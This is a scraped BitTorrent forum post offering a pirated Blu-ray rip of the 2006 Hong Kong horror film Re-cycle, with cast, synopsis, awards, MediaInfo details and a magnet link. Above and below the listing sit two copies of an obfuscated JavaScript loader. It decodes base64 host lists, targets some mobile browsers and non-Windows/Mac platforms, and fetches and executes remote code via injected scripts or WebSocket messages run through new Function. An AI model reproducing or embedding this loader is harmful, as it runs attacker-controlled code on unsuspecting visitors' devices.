鬼域[粤语音轨/简繁字幕].Re-cycle.2006.BluRay.1080p.DTS-HD.MA.5.1.x265.10bit 10.91GB

版主小s 1月前 486

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 鬼域 / Re-cycle

◎年 代 2006

◎产 地 中国香港 / 泰国

◎类 别 悬疑 / 惊悚 / 恐怖 / 奇幻

◎语 言 粤语

◎上映日期 2006-06-30

◎IMDb链接 https://www.imdb.com/title/tt0498311/

◎豆瓣评分 6.6/10 (13680人评价)

◎豆瓣链接 https://movie.douban.com/subject/1778999/

◎片 长 108 分钟

◎导 演 彭顺 Oxide Pang (id:1280774)

彭发 Danny Pang (id:1293885)

◎编 剧 钱江汉 Chin Cub (id:1328093)

彭发 Danny Pang (id:1293885)

彭顺 Oxide Pang (id:1280774)

彭柏成 Thomas Pang (id:1327610)

◎演 员 李心洁 Angelica Lee (id:1005331)

李彩桦 Rain Li (id:1042200)

周俊伟 Lawrence Chou (id:1001466)

刘兆铭 Lau Siu Ming (id:1313719)

郑保瑞 Pou-Soi Cheang (id:1274240)

彭顺 Oxide Pang (id:1280774)

彭发 Danny Pang (id:1293885)

Decha Srimantra Decha Srimantra (id:1298207)

彭顺 Oxide Pang (id:1280774)

彭发 Danny Pang (id:1293885)

彭正熙 Curran Pang (id:1305790)

吴里璐 Dora Ng (id:1289270)

文念中 Lim Chung Man (id:1275158)

冯君孟 William Fung (id:1284331)

吴炫辉 Yuen Fai Ng (id:1275160)

林洪峯 Alex Lim Hung Fung (id:1330656)

贾德特·查旺 Jadet Chawang (id:1370050)

拿荣猜·奥恩-捷 Narongchai Aunn-Jai (id:1370045)

Nakom Kositpaisal Nakom Kositpaisal (id:1330654)

◎标 签 恐怖 / 香港 / 李心洁 / 惊悚 / 彭氏兄弟 / 香港电影 / 鬼域 / 灵异

◎简 介

女作家徐寻(李心洁)在处女小说获得空前成功后陷入创作困境。在创作新的定名为《鬼域》的小说时,她期望向读者呈现一个如幻似真的“诡异空间”,无奈反反复复几次构想出来的故事情节都差强人意,而昔日情人的再一次现身,更令她心绪纷乱,一怒之下,她删除了电脑里的《鬼域》初稿,却自此进入自己虚构出来的“鬼域”。

一番惊险之旅之后,徐寻在鬼域里遇见一小女孩(曾雅琪),得知鬼域意为“被遗弃的空间”,现实生活中人们所遗弃的一切(包括打掉的胎儿),都能在这里找到。在该女孩的帮助下,徐寻开始了更加恐怖的逃亡旅程,后来两人在鬼域老伯(刘兆铭)的指点下,朝鬼域的出口奔去,小女孩的身世之谜逐渐被揭开。

◎获奖情况 (共8项)

第59届戛纳电影节 (2006)

一种关注单元 一种关注大奖(提名)

第43届台北金马影展 (2006)

金马奖 最佳女主角(提名)

└──李心洁 (id:1005331)

金马奖 最佳美术设计(提名)

└──拿荣猜·奥恩-捷 (id:1370045)

金马奖 最佳音效(提名)

└──贾德特·查旺 (id:1370050)

金马奖 最佳视觉效果(提名)

└──吴炫辉 (id:1275160)

第26届香港电影金像奖 (2007)

最佳女主角(提名)

└──李心洁 (id:1005331)

最佳音响效果

└──Nakom Kositpaisal (id:1330654)

最佳视觉效果

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 8847843089853123079919168349538979114 (0x6A808582555C788C9B2742DEEC98D2A)

  4. Complete name : [email protected].COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 10.9 GiB

  8. Duration : 1 h 48 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 14.4 Mb/s

  11. Encoded date : UTC 2021-10-27 13:05:56

  12. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  13. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 48 min

  21. Bit rate : 12.0 Mb/s

  22. Width : 1 920 pixels

  23. Height : 816 pixels

  24. Display aspect ratio : 2.35:1

  25. Frame rate mode : Constant

  26. Frame rate : 24.000 FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.320

  31. Stream size : 9.14 GiB (84%)

  32. Title : HEVC, [email protected]@High, 24 fps @ 12020 kbps

  33. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  34. Encoding settings : cpuid=533541111039 / frame-threads=4 / numa-pools=16 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x816 / interlace=0 / total-frames=156744 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=17.0 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  35. Language : English

  36. Default : Yes

  37. Forced : No

  38. Color range : Limited

  39. Color primaries : BT.709

  40. Transfer characteristics : BT.709

  41. Matrix coefficients : BT.709


  42. Audio

  43. ID : 2

  44. Format : DTS XLL

  45. Format/Info : Digital Theater Systems

  46. Commercial name : DTS-HD Master Audio

  47. Codec ID : A_DTS

  48. Duration : 1 h 48 min

  49. Bit rate mode : Variable

  50. Bit rate : 2 303 kb/s

  51. Channel(s) : 6 channels

  52. Channel layout : C L R Ls Rs LFE

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 93.750 FPS (512 SPF)

  55. Bit depth : 16 bits

  56. Compression mode : Lossless

  57. Stream size : 1.75 GiB (16%)

  58. Title : Cantonese DTS-HD Master Audio 5.1 @ 2303 kbps

  59. Language : Chinese

  60. Default : Yes

  61. Forced : No


  62. Text #1

  63. ID : 3

  64. Format : PGS

  65. Codec ID : S_HDMV/PGS

  66. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  67. Duration : 1 h 39 min

  68. Bit rate : 12.3 kb/s

  69. Count of elements : 1042

  70. Stream size : 8.77 MiB (0%)

  71. Title : Eng/SUP

  72. Language : English

  73. Default : No

  74. Forced : No


  75. Text #2

  76. ID : 4

  77. Format : PGS

  78. Codec ID : S_HDMV/PGS

  79. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  80. Duration : 1 h 39 min

  81. Bit rate : 7 029 b/s

  82. Count of elements : 890

  83. Stream size : 5.01 MiB (0%)

  84. Title : Chs/SUP 简体

  85. Language : Chinese

  86. Default : Yes

  87. Forced : No


  88. Text #3

  89. ID : 5

  90. Format : PGS

  91. Codec ID : S_HDMV/PGS

  92. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  93. Duration : 1 h 39 min

  94. Bit rate : 7 248 b/s

  95. Count of elements : 890

  96. Stream size : 5.16 MiB (0%)

  97. Title : Cht/SUP 繁体

  98. Language : Chinese

  99. Default : No

  100. Forced : No


  101. Menu

  102. 00:00:00.000 : en:第 01 章

  103. 00:05:30.417 : en:第 02 章

  104. 00:11:07.583 : en:第 03 章

  105. 00:19:41.750 : en:第 04 章

  106. 00:31:16.333 : en:第 05 章

  107. 00:41:22.625 : en:第 06 章

  108. 00:50:32.833 : en:第 07 章

  109. 01:02:08.833 : en:第 08 章

  110. 01:13:00.833 : en:第 09 章

  111. 01:24:32.667 : en:第 10 章

  112. 01:41:47.833 : en:第 11 章

  113. 01:44:10.833 : en:第 12 章




复制代码


TAGS 奇幻 惊悚 恐怖 悬疑

磁力链:
  • magnet:?xt=urn:btih:CB90E76A8AFED4EE52CDD777AEECCE7B77F97A50

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};